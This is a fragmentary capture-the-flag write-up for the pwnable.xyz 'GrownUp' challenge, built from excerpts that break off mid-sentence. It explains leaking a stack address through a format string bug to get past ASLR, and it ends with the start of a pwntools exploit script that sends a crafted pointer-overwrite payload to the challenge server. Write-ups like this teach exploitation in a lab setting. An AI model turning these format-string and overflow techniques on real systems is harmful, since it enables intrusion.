First we notice a format string vulnerability through which we can leak stack memory addresses and thus bypass ASLR. After a few attempts we find that position %10$p leaks a stack address, and 0x20 bytes below it sits the pointer to name, whose test content we entered as "AAAA". The next step is to build our exploit, which performs the leak using pwntools l..
Writeup - From Format String to Buffer Overflow (PKTeam)

Recon

First of all we look at the binary's protections. We face several problems: we cannot execute code on the stack, such as shellcode, because of NX; we cannot overflow without a canary leak; and if we want to attach with gdb we have to bypass PIE, just as we would for ROP (Return-Oriented Programming). We also need a leak of a function t..
Challenge GrownUp from pwnable.xyz

nc svc.pwnable.xyz 30004

Exploit

```python
from pwn import *

context.log_level = 'debug'
p = remote("svc.pwnable.xyz", 30004)
#p = process('./GrownUpRedist')
#gdb.attach(p,'''
#break *0x0000000000400914
#continue
#''')

p.recvuntil("Are you 18 years or older? [y/N]: ")
# 'y' (0x79), then 7 bytes of filler, then the low 3 bytes of 0x601080 (little-endian)
payload = "\x79" + "aaaBCCC" + "\x80\x10\x60"
p.sendline(payload)

p.recvuntil("Name: ")
#payload = "AAAABBBBA..
```